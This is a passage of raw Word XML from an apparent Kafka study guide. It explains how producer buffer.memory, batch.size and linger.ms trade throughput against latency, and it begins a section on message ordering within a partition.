    <w:p w14:paraId="5C2E55DF" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149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he </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>batch size</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (batch.size) and </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linger.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> configurations also play a significant role. If you increase the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>batch size</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linger.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you can increase throughput by allowing more messages to be batched together. The producer waits for more messages before sending a batch, which reduces the total number of requests and increases throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A145B1" w14:textId="77777777" w:rsidR="00C40C3A"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F7DFAE2">
          <v:rect id="_x0000_i3200" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFB96E7" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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Example of Buffer Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D902A6" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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sider a Kafka producer with the following configurations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B474EE7" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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erties props = new Properties();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AAE163" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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s.put("bootstrap.servers", "localhost:9092");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B957B57" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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s.put("acks", "all");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A9937F" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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s.put("buffer.memory", 33554432); // 32 MB buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248C2F47" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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s.put("batch.size", 16384); // 16 KB batch size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FE7CDA" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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ps.put("linger.ms", 10); // Wait for up to 10ms to fill the batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E088AAB" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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With a Large Buffer Size:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC82F0" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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e producer can accumulate more messages in the buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F7E93D" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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Larger batches are sent less frequently, which reduces network overhead and increases </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBB778A" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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However, the latency for individual messages may be higher because the producer waits to fill the buffer before sending messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E5D3AE" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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With a Small Buffer Size:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F69F4B" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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he producer will send messages more frequently, which may result in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lower latency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for individual messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4849B512" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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he trade-off is that </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>network traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be higher, and </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overall throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> could be lower due to the increased number of requests being made.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB44F8D" w14:textId="77777777" w:rsidR="00C40C3A"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0EA2F8">
          <v:rect id="_x0000_i3201" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="765CB028" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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Buffer Size Configurations and Their Effects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDEE9DD" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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uffer.memory</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Determines the total amount of memory available to the producer for buffering. If the buffer is full, the producer will block until space becomes available or an error is thrown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBE9C86" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149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arger buffer.memory allows the producer to accumulate more messages and handle bursts in message traffic without blocking, improving throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2187A755" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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atch.size</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the maximum size of a batch of messages to send to Kafka. This directly affects how many messages can be batched together and sent at once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2B3C05" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149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arger batch.size improves throughput but may introduce some latency due to waiting to fill the batch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AA8B58" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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inger.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This configures how long the producer will wait before sending a batch, even if the batch is not full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B08ECE" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149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A higher value increases the likelihood of the producer batching more messages together, improving throughput but potentially introducing higher latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E633487" w14:textId="77777777" w:rsidR="00C40C3A"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F8EC91B">
          <v:rect id="_x0000_i3202" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE2E1A8" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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lastRenderedPageBreak/>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F7AFDE" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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arger Buffer Size</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29229637" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149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Advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Higher </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, fewer requests to the broker, better handling of burst traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE98928" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149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isadvantages</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Higher latency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for individual messages, potential memory consumption issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503FA0D1" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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maller Buffer Size</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3409513C" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149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Advantages</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Lower latency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for individual messages, quicker response times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647E466F" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149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isadvantages</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Lower throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, higher network traffic, and more frequent batch processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B60EFC8" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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Ultimately, the optimal buffer size depends on your application’s needs. If high throughput is crucial (e.g., large-scale data ingestion), a larger buffer will help. If low-latency message delivery is more important (e.g., real-time applications), a smaller buffer may be beneficial. Finding the right balance between these factors is key to optimizing Kafka producer performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347D78EC" w14:textId="642BBFA6"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8B87281">
          <v:rect id="_x0000_i3203" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C94BC17" w14:textId="01454226" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E3566C" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="804" w:name="_Toc196308284"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Kafka handle message ordering within a partition</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="804"/>
    </w:p>
    <w:p w14:paraId="1B83CDDE" w14:textId="2273B4E7" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00DD6F3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Message Ordering in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7D6FC7" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="005D2BDE">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ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by guaranteeing that messages within a single partition are delivered in the exact order in which they were produced. However, this guarantee is only valid </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>within a partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and not across multiple partitions. Here's how Kafka handles message ordering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2935ECA0" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="00000000" w:rsidP="005D2BDE">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B9F6D1">
          <v:rect id="_x0000_i3204" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C38CF8" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="005D2BDE">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1. Partition-Level Ordering Guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D03CD94" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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afka Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When a producer sends messages to Kafka, it can specify a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to which the message should be sent. If no specific partition is specified, Kafka uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitioner</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to determine the appropriate partition for the message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F2652F" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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ingle Partition Ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka guarantees that messages sent to the same </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be consumed in the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same order</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in which they were produced. This means that if multiple messages are sent to a particular partition, Kafka ensures that these messages are stored and consumed in the same sequence as they were written.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F207B50" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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nternally</w:t>
      </w:r>
